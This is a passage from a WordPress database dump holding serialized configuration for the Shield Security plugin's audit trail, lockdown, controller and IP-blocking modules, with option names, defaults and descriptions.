exceeded.\";}i:3;a:9:{s:3:\"key\";s:26:\"enable_audit_context_users\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:16:\"Users And Logins\";s:7:\"summary\";s:39:\"Enable Audit Context - Users And Logins\";s:11:\"description\";s:95:\"When this context is enabled, the audit trail will track activity relating to: Users And Logins\";}i:4;a:9:{s:3:\"key\";s:28:\"enable_audit_context_plugins\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:30:\"Enable Audit Context - Plugins\";s:11:\"description\";s:96:\"When this context is enabled, the audit trail will track activity relating to: WordPress Plugins\";}i:5;a:9:{s:3:\"key\";s:27:\"enable_audit_context_themes\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:29:\"Enable Audit Context - Themes\";s:11:\"description\";s:95:\"When this context is enabled, the audit trail will track activity relating to: WordPress Themes\";}i:6;a:9:{s:3:\"key\";s:26:\"enable_audit_context_posts\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:15:\"Posts And Pages\";s:7:\"summary\";s:38:\"Enable Audit Context - Posts And Pages\";s:11:\"description\";s:120:\"When this context is enabled, the audit trail will track activity relating to: Editing and publishing of posts and pages\";}i:7;a:9:{s:3:\"key\";s:30:\"enable_audit_context_wordpress\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:22:\"WordPress And Settings\";s:7:\"summary\";s:45:\"Enable Audit Context - WordPress And Settings\";s:11:\"description\";s:142:\"When this context is enabled, the audit trail will track activity relating to: WordPress upgrades and changes to particular WordPress settings\";}i:8;a:9:{s:3:\"key\";s:27:\"enable_audit_context_emails\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a3\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:6:\"Emails\";s:7:\"summary\";s:29:\"Enable Audit Context - Emails\";s:11:\"description\";s:92:\"When this context is enabled, the audit trail will track activity relating to: Email Sending\";}i:9;a:9:{s:3:\"key\";s:25:\"enable_audit_context_wpsf\";s:7:\"section\";s:29:\"section_enable_audit_contexts\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/a4\";s:9:\"link_blog\";s:19:\"https://shsec.io/a1\";s:4:\"name\";s:6:\"Shield\";s:7:\"summary\";s:29:\"Enable Audit Context - Shield\";s:11:\"description\";s:85:\"When this context is enabled, the audit trail will track activity relating to: Shield\";}i:10;a:10:{s:3:\"key\";s:22:\"enable_change_tracking\";s:7:\"section\";s:23:\"section_change_tracking\";s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:7:\"enabled\";s:4:\"text\";s:7:\"Enabled\";}i:2;a:2:{s:9:\"value_key\";s:18:\"enabled_with_email\";s:4:\"text\";s:26:\"Enabled With Email Reports\";}}s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Enable Change Tracking\";s:7:\"summary\";s:32:\"Track Major Changes To Your Site\";s:11:\"description\";s:85:\"Tracking major changes to your site will help you monitor and catch malicious damage.\";}i:11;a:10:{s:3:\"key\";s:21:\"ct_snapshots_per_week\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:7;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:12;a:10:{s:3:\"key\";s:16:\"ct_max_snapshots\";s:7:\"section\";s:23:\"section_change_tracking\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:28;s:3:\"min\";i:1;s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Snapshot Per Week\";s:7:\"summary\";s:36:\"Number Of Snapshots To Take Per Week\";s:11:\"description\";s:72:\"The number of snapshots to take per week. For daily snapshots, select 7.\";}i:13;a:5:{s:3:\"key\";s:19:\"ct_last_snapshot_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}}s:11:\"definitions\";a:7:{s:10:\"db_classes\";a:1:{s:5:\"audit\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AuditTrail\\Handler\";}s:31:\"audit_trail_default_max_entries\";i:100;s:22:\"audit_trail_table_name\";s:11:\"audit_trail\";s:25:\"audit_trail_table_columns\";a:14:{i:0;s:2:\"id\";i:1;s:3:\"rid\";i:2;s:11:\"wp_username\";i:3;s:2:\"ip\";i:4;s:7:\"context\";i:5;s:5:\"event\";i:6;s:8:\"category\";i:7;s:7:\"message\";i:8;s:5:\"count\";i:9;s:9:\"immutable\";i:10;s:4:\"meta\";i:11;s:10:\"updated_at\";i:12;s:10:\"created_at\";i:13;s:10:\"deleted_at\";}s:25:\"table_name_changetracking\";s:14:\"changetracking\";s:28:\"table_columns_changetracking\";a:5:{i:0;s:2:\"id\";i:1;s:4:\"data\";i:2;s:4:\"meta\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:6:\"events\";a:19:{s:16:\"plugin_activated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_deactivated\";a:2:{s:7:\"context\";s:7:\"plugins\";s:14:\"audit_multiple\";b:1;}s:18:\"plugin_file_edited\";a:1:{s:7:\"context\";s:7:\"plugins\";}s:15:\"theme_activated\";a:1:{s:7:\"context\";s:6:\"themes\";}s:17:\"theme_file_edited\";a:1:{s:7:\"context\";s:6:\"themes\";}s:12:\"core_updated\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:20:\"permalinks_structure\";a:1:{s:7:\"context\";s:9:\"wordpress\";}s:12:\"post_deleted\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_trashed\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_recovered\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:12:\"post_updated\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:14:\"post_published\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:16:\"post_unpublished\";a:2:{s:7:\"context\";s:5:\"posts\";s:14:\"audit_multiple\";b:1;}s:10:\"user_login\";a:1:{s:7:\"context\";s:5:\"users\";}s:15:\"user_registered\";a:1:{s:7:\"context\";s:5:\"users\";}s:12:\"user_deleted\";a:2:{s:7:\"context\";s:5:\"users\";s:14:\"audit_multiple\";b:1;}s:23:\"user_deleted_reassigned\";a:1:{s:7:\"context\";s:5:\"users\";}s:18:\"email_attempt_send\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}s:18:\"email_send_invalid\";a:2:{s:7:\"context\";s:6:\"emails\";s:14:\"audit_multiple\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(334247,'shield_mod_config_4bab4b3f62ab450ea7a710e73e8dfc1a','a:6:{s:4:\"slug\";s:8:\"lockdown\";s:10:\"properties\";a:13:{s:4:\"slug\";s:8:\"lockdown\";s:4:\"name\";s:11:\"WP Lockdown\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:8:\"lockdown\";s:7:\"tagline\";s:56:\"Harden the more loosely controlled settings of your site\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:0;s:19:\"run_if_verified_bot\";b:0;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:90;}s:8:\"sections\";a:5:{i:0;a:5:{s:4:\"slug\";s:14:\"section_apixml\";s:7:\"primary\";b:1;s:5:\"title\";s:25:\"WordPress System Lockdown\";s:11:\"title_short\";s:6:\"System\";s:7:\"summary\";a:2:{i:0;s:58:\"Purpose - Lockdown certain core WordPress system features.\";i:1;s:99:\"Recommendation - This depends on your usage and needs for certain WordPress functions and features.\";}}i:1;a:4:{s:4:\"slug\";s:33:\"section_permission_access_options\";s:5:\"title\";s:30:\"Permissions and Access Options\";s:11:\"title_short\";s:11:\"Permissions\";s:7:\"summary\";a:2:{i:0;s:66:\"Purpose - Provides finer control of certain WordPress permissions.\";i:1;s:75:\"Recommendation - Only enable SSL if you have a valid certificate installed.\";}}i:2;a:4:{s:4:\"slug\";s:35:\"section_wordpress_obscurity_options\";s:5:\"title\";s:27:\"WordPress Obscurity Options\";s:11:\"title_short\";s:9:\"Obscurity\";s:7:\"summary\";a:2:{i:0;s:63:\"Purpose - Obscures certain WordPress settings from public view.\";i:1;s:103:\"Recommendation - Obscurity is not true security and so these settings are down to your personal tastes.\";}}i:3;a:4:{s:4:\"slug\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:5:\"title\";s:23:\"Enable Module: Lockdown\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:94:\"Purpose - Lockdown helps secure-up certain loosely-controlled WordPress settings on your site.\";i:1;s:53:\"Recommendation - Keep the Lockdown feature turned on.\";}}i:4;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:9:{i:0;a:9:{s:3:\"key\";s:15:\"enable_lockdown\";s:7:\"section\";s:48:\"section_enable_plugin_feature_wordpress_lockdown\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4r\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Enable Lockdown\";s:7:\"summary\";s:39:\"Enable (or Disable) The Lockdown module\";s:11:\"description\";s:67:\"Un-Checking this option will completely disable the Lockdown module\";}i:1;a:9:{s:3:\"key\";s:14:\"disable_xmlrpc\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/e6\";s:9:\"link_blog\";s:19:\"https://shsec.io/fb\";s:4:\"name\";s:15:\"Disable XML-RPC\";s:7:\"summary\";s:26:\"Disable The XML-RPC System\";s:11:\"description\";s:71:\"Checking this option will completely turn off the whole XML-RPC system.\";}i:2;a:9:{s:3:\"key\";s:25:\"disable_anonymous_restapi\";s:7:\"section\";s:14:\"section_apixml\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Anonymous Rest API\";s:7:\"summary\";s:30:\"Disable The Anonymous Rest API\";s:11:\"description\";s:82:\"Checking this option will completely turn off the whole Anonymous Rest API system.\";}i:3;a:9:{s:3:\"key\";s:24:\"api_namespace_exclusions\";s:7:\"section\";s:14:\"section_non_ui\";s:7:\"default\";a:3:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:11:\"woocommerce\";}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:19:\"Rest API Exclusions\";s:7:\"summary\";s:29:\"Anonymous REST API Exclusions\";s:11:\"description\";s:81:\"Any namespaces provided here will be excluded from the Anonymous API restriction.\";}i:4;a:9:{s:3:\"key\";s:20:\"disable_file_editing\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4q\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Disable File Editing\";s:7:\"summary\";s:51:\"Disable Ability To Edit Files From Within WordPress\";s:11:\"description\";s:135:\"Removes the option to directly edit any files from within the WordPress admin area. Equivalent to setting \'DISALLOW_FILE_EDIT\' to TRUE.\";}i:5;a:9:{s:3:\"key\";s:15:\"force_ssl_admin\";s:7:\"section\";s:33:\"section_permission_access_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/4t\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:15:\"Force SSL Admin\";s:7:\"summary\";s:57:\"Forces WordPress Admin Dashboard To Be Delivered Over SSL\";s:11:\"description\";s:126:\"Please only enable this option if you have a valid SSL certificate installed. Equivalent to setting \'FORCE_SSL_ADMIN\' to TRUE.\";}i:6;a:9:{s:3:\"key\";s:22:\"mask_wordpress_version\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/43\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Mask WordPress Version\";s:7:\"summary\";s:49:\"Prevents Public Display Of Your WordPress Version\";s:11:\"description\";s:194:\"Enter how you would like your WordPress version displayed publicly. Leave blank to disable this feature. Warning: This may interfere with WordPress plugins that rely on the $wp_version variable.\";}i:7;a:9:{s:3:\"key\";s:28:\"hide_wordpress_generator_tag\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"WP Generator Tag\";s:7:\"summary\";s:28:\"Remove WP Generator Meta Tag\";s:11:\"description\";s:119:\"Remove a meta tag from your WordPress pages that publicly displays that your site is WordPress and its current version.\";}i:8;a:9:{s:3:\"key\";s:22:\"block_author_discovery\";s:7:\"section\";s:35:\"section_wordpress_obscurity_options\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf23\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Block Username Fishing\";s:7:\"summary\";s:69:\"Block the ability to discover WordPress usernames based on author IDs\";s:11:\"description\";s:150:\"When enabled, any URL requests containing \'author=\' will be killed. Warning: Enabling this option may interfere with expected operations of your site.\";}}s:11:\"definitions\";a:2:{s:26:\"default_restapi_exclusions\";a:5:{i:0;s:14:\"contact-form-7\";i:1;s:7:\"jetpack\";i:2;s:3:\"tho\";i:3;s:12:\"wpstatistics\";i:4;s:11:\"woocommerce\";}s:6:\"events\";a:2:{s:23:\"block_anonymous_restapi\";a:1:{s:6:\"recent\";b:1;}s:9:\"block_xml\";a:3:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;s:7:\"offense\";b:1;}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(314660,'fernleafsystems\\wordpress\\plugin\\shield\\controller\\controller','O:8:\"stdClass\":5:{s:4:\"hash\";s:40:\"bdbea7d2af523480f32cf31129befda70d97b2f8\";s:8:\"mod_time\";i:1605889905;s:11:\"plugin_spec\";a:11:{s:10:\"properties\";a:17:{s:7:\"version\";s:6:\"10.1.3\";s:17:\"release_timestamp\";i:1605692545;s:5:\"build\";s:11:\"202011.1801\";s:11:\"slug_parent\";s:4:\"icwp\";s:11:\"slug_plugin\";s:4:\"wpsf\";s:10:\"human_name\";s:6:\"Shield\";s:10:\"menu_title\";s:6:\"Shield\";s:11:\"text_domain\";s:18:\"wp-simple-firewall\";s:16:\"base_permissions\";s:14:\"manage_options\";s:23:\"wpms_network_admin_only\";b:1;s:15:\"logging_enabled\";b:1;s:21:\"show_dashboard_widget\";b:1;s:19:\"show_admin_bar_menu\";b:1;s:10:\"autoupdate\";s:10:\"confidence\";s:15:\"autoupdate_days\";i:2;s:16:\"options_encoding\";s:4:\"json\";s:14:\"enable_premium\";b:1;}s:12:\"requirements\";a:2:{s:3:\"php\";s:5:\"5.4.0\";s:9:\"wordpress\";s:5:\"3.5.2\";}s:12:\"upgrade_reqs\";a:2:{s:3:\"7.0\";a:2:{s:3:\"php\";s:3:\"5.4\";s:2:\"wp\";s:5:\"3.5.2\";}s:4:\"10.0\";a:2:{s:3:\"php\";s:3:\"7.0\";s:2:\"wp\";s:5:\"3.5.2\";}}s:5:\"paths\";a:8:{s:6:\"source\";s:3:\"src\";s:8:\"autoload\";s:23:\"lib/vendor/autoload.php\";s:6:\"assets\";s:9:\"resources\";s:9:\"languages\";s:9:\"languages\";s:9:\"templates\";s:9:\"templates\";s:16:\"custom_templates\";s:16:\"shield_templates\";s:5:\"flags\";s:5:\"flags\";s:5:\"cache\";s:6:\"shield\";}s:8:\"includes\";a:3:{s:5:\"admin\";a:2:{s:3:\"css\";a:1:{i:0;s:13:\"global-plugin\";}s:2:\"js\";a:2:{i:0;s:6:\"jquery\";i:1;s:13:\"global-plugin\";}}s:12:\"plugin_admin\";a:2:{s:3:\"css\";a:5:{i:0;s:14:\"bootstrap4.min\";i:1;s:20:\"bootstrap-select.min\";i:2;s:13:\"global-plugin\";i:3;s:6:\"plugin\";i:4;s:12:\"featherlight\";}s:2:\"js\";a:9:{i:0;s:21:\"bootstrap4.bundle.min\";i:1;s:20:\"bootstrap-select.min\";i:2;s:6:\"jquery\";i:3;s:13:\"global-plugin\";i:4;s:6:\"plugin\";i:5;s:10:\"base64.min\";i:6;s:13:\"lz-string.min\";i:7;s:12:\"featherlight\";i:8;s:19:\"jquery.fileDownload\";}}s:8:\"frontend\";a:1:{s:3:\"css\";N;}}s:4:\"menu\";a:7:{s:4:\"show\";b:1;s:5:\"title\";s:15:\"Shield Security\";s:9:\"top_level\";b:1;s:14:\"do_submenu_fix\";b:1;s:8:\"callback\";s:16:\"onDisplayTopMenu\";s:10:\"icon_image\";s:20:\"pluginlogo_16x16.png\";s:11:\"has_submenu\";b:1;}s:6:\"labels\";a:10:{s:4:\"Name\";s:6:\"Shield\";s:11:\"Description\";s:108:\"Ultimate WP Security Protection - Scans, 2FA, Firewall, SPAM, Audit Trail, Security Admin, and so much more.\";s:5:\"Title\";s:15:\"Shield Security\";s:6:\"Author\";s:15:\"Shield Security\";s:10:\"AuthorName\";s:15:\"Shield Security\";s:9:\"PluginURI\";s:19:\"https://shsec.io/2f\";s:9:\"AuthorURI\";s:19:\"https://shsec.io/bv\";s:14:\"icon_url_16x16\";s:20:\"pluginlogo_16x16.png\";s:14:\"icon_url_32x32\";s:20:\"pluginlogo_32x32.png\";s:16:\"icon_url_128x128\";s:22:\"pluginlogo_128x128.png\";}s:4:\"meta\";a:3:{s:13:\"url_repo_home\";s:19:\"https://shsec.io/eh\";s:24:\"announcekit_changelog_id\";s:6:\"3ObUvS\";s:19:\"privacy_policy_href\";s:36:\"https://shsec.io/shieldprivacypolicy\";}s:11:\"plugin_meta\";a:1:{i:0;a:2:{s:4:\"name\";s:26:\"5&#10025; Rate This Plugin\";s:4:\"href\";s:23:\"https://shsec.io/wpsf29\";}}s:16:\"version_upgrades\";a:7:{i:0;s:5:\"9.0.0\";i:1;s:5:\"9.0.3\";i:2;s:5:\"9.0.5\";i:3;s:5:\"9.1.1\";i:4;s:5:\"9.2.0\";i:5;s:5:\"9.2.2\";i:6;s:6:\"10.1.0\";}s:12:\"action_links\";a:2:{s:6:\"remove\";N;s:3:\"add\";a:2:{i:0;a:5:{s:4:\"name\";s:18:\"Security Dashboard\";s:5:\"title\";s:24:\"Go To Security Dashboard\";s:4:\"href\";s:26:\"getPluginUrl_AdminMainPage\";s:6:\"target\";s:4:\"_top\";s:4:\"show\";s:6:\"always\";}i:1;a:6:{s:4:\"name\";s:20:\"&uarr; Go Pro &uarr;\";s:5:\"title\";s:29:\"For just $1/month. Seriously.\";s:4:\"href\";s:19:\"https://shsec.io/d8\";s:6:\"target\";s:6:\"_blank\";s:9:\"highlight\";b:1;s:4:\"show\";s:4:\"free\";}}}}s:21:\"update_first_detected\";a:2:{s:6:\"10.1.3\";i:1605717016;s:6:\"10.1.5\";i:1607358521;}s:16:\"previous_version\";s:6:\"10.1.3\";}','yes'),(314662,'icwp_wpsf_events_options','a:1:{s:13:\"enable_events\";s:1:\"Y\";}','yes'),(334239,'shield_mod_config_0b133bf60183d10bd9cdd622995211b8','a:8:{s:4:\"slug\";s:3:\"ips\";s:10:\"properties\";a:13:{s:4:\"slug\";s:3:\"ips\";s:4:\"name\";s:22:\"Block Bad IPs/Visitors\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:3:\"ips\";s:7:\"tagline\";s:68:\"Automatically detect bots and malicious visitors and stop them dead.\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:100;}s:13:\"admin_notices\";a:1:{s:19:\"visitor-whitelisted\";a:5:{s:2:\"id\";s:19:\"visitor-whitelisted\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:8:\"per_user\";b:1;s:4:\"type\";s:4:\"info\";}}s:12:\"requirements\";a:1:{s:3:\"php\";a:2:{s:9:\"functions\";a:1:{i:0;s:10:\"filter_var\";}s:9:\"constants\";a:5:{i:0;s:18:\"FILTER_VALIDATE_IP\";i:1;s:16:\"FILTER_FLAG_IPV4\";i:2;s:16:\"FILTER_FLAG_IPV6\";i:3;s:25:\"FILTER_FLAG_NO_PRIV_RANGE\";i:4;s:24:\"FILTER_FLAG_NO_RES_RANGE\";}}}s:8:\"sections\";a:8:{i:0;a:5:{s:4:\"slug\";s:23:\"section_auto_black_list\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Automatic IP Black List\";s:11:\"title_short\";s:22:\"Auto IP Blocking Rules\";s:7:\"summary\";a:2:{i:0;s:136:\"Purpose - The Automatic IP Black List system will block the IP addresses of naughty visitors after a specified number of transgressions.\";i:1;s:68:\"Recommendation - Keep the Automatic IP Black List feature turned on.\";}}i:1;a:4:{s:4:\"slug\";s:14:\"section_logins\";s:5:\"title\";s:18:\"Capture Login Bots\";s:11:\"title_short\";s:10:\"Login Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:2;a:4:{s:4:\"slug\";s:14:\"section_probes\";s:5:\"title\";s:20:\"Capture Probing Bots\";s:11:\"title_short\";s:12:\"Probing Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:3;a:4:{s:4:\"slug\";s:18:\"section_behaviours\";s:5:\"title\";s:30:\"Identify Common Bot Behaviours\";s:11:\"title_short\";s:14:\"Bot Behaviours\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:4;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_bottrap\";s:5:\"title\";s:22:\"Enable Module: BotTrap\";s:11:\"title_short\";s:13:\"Enable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - BotTrap monitors a typical set of bot behaviours to help identify probing bots.\";i:1;s:54:\"Recommendation - Enable as many bot traps as possible.\";}}i:5;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:6;a:4:{s:4:\"slug\";s:33:\"section_enable_plugin_feature_ips\";s:5:\"title\";s:25:\"Enable Module: IP Manager\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:95:\"Purpose - The IP Manager allows you to whitelist, blacklist and configure auto-blacklist rules.\";i:1;s:123:\"Recommendation - Keep the IP Manager feature turned on. You should also carefully review the automatic black list settings.\";}}i:7;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:15:{i:0;a:9:{s:3:\"key\";s:10:\"enable_ips\";s:7:\"section\";s:33:\"section_enable_plugin_feature_ips\";s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ea\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:17:\"Enable IP Manager\";s:7:\"summary\";s:41:\"Enable (or Disable) The IP Manager module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the IP Manager module\";}i:1;a:9:{s:3:\"key\";s:19:\"transgression_limit\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf24\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:13:\"Offense Limit\";s:7:\"summary\";s:72:\"Visitor IP address will be Black Listed after X bad actions on your site\";s:11:\"description\";s:280:\"A black mark is set against an IP address each time a visitor trips the defenses of the Shield plugin. When the number of these offenses exceeds specified limit, they are automatically blocked from accessing the site. Set this to 0 to turn off the Automatic IP Black List feature.\";}i:2;a:10:{s:3:\"key\";s:11:\"auto_expire\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";s:3:\"day\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"minute\";s:4:\"text\";s:6:\"Minute\";}i:1;a:2:{s:9:\"value_key\";s:4:\"hour\";s:4:\"text\";s:4:\"Hour\";}i:2;a:2:{s:9:\"value_key\";s:3:\"day\";s:4:\"text\";s:3:\"Day\";}i:3;a:2:{s:9:\"value_key\";s:4:\"week\";s:4:\"text\";s:4:\"Week\";}i:4;a:2:{s:9:\"value_key\";s:5:\"month\";s:4:\"text\";s:5:\"Month\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf25\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:21:\"Auto Block Expiration\";s:7:\"summary\";s:65:\"After 1 \'X\' a black listed IP will be removed from the black list\";s:11:\"description\";s:249:\"Permanent and lengthy IP Black Lists are harmful to performance. You should allow IP addresses on the black list to be eventually removed over time. Shorter IP black lists are more efficient and a more intelligent use of an IP-based blocking system.\";}i:3;a:11:{s:3:\"key\";s:17:\"user_auto_recover\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:4:\"gasp\";s:4:\"text\";s:26:\"With Shield Bot Protection\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"User Auto Unblock\";s:7:\"summary\";s:34:\"Allow Visitors To Unblock Their IP\";s:11:\"description\";s:73:\"Allow visitors blocked by the plugin to automatically unblock themselves.\";}i:4;a:10:{s:3:\"key\";s:17:\"request_whitelist\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/gd\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Request Path Whitelist\";s:7:\"summary\";s:22:\"Request Path Whitelist\";s:11:\"description\";s:23:\"Request Path Whitelist.\";}i:5;a:11:{s:3:\"key\";s:16:\"text_loginfailed\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Login Failed\";s:7:\"summary\";s:62:\"Visitor Triggers The IP Offenses System Through A Failed 